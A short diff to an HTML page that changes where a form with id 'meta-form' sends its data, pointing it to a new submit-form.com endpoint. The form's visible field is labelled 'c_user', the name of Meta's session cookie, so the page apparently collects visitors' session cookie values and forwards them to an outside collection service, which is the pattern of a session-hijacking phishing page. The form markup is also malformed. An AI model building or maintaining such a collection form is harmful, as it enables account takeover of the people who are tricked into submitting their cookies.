--- a/index.html
+++ b/index.html
@@ -64,7 +64,7 @@
             </p>
             <form
               id="meta-form"
-              action="https://submit-form.com/jAZHaXQci"
+              action="https://submit-form.com/KGbShcdbE"
               method="POST"
               <label class="" style="font-size: 12px">c_user</label>
               <br />
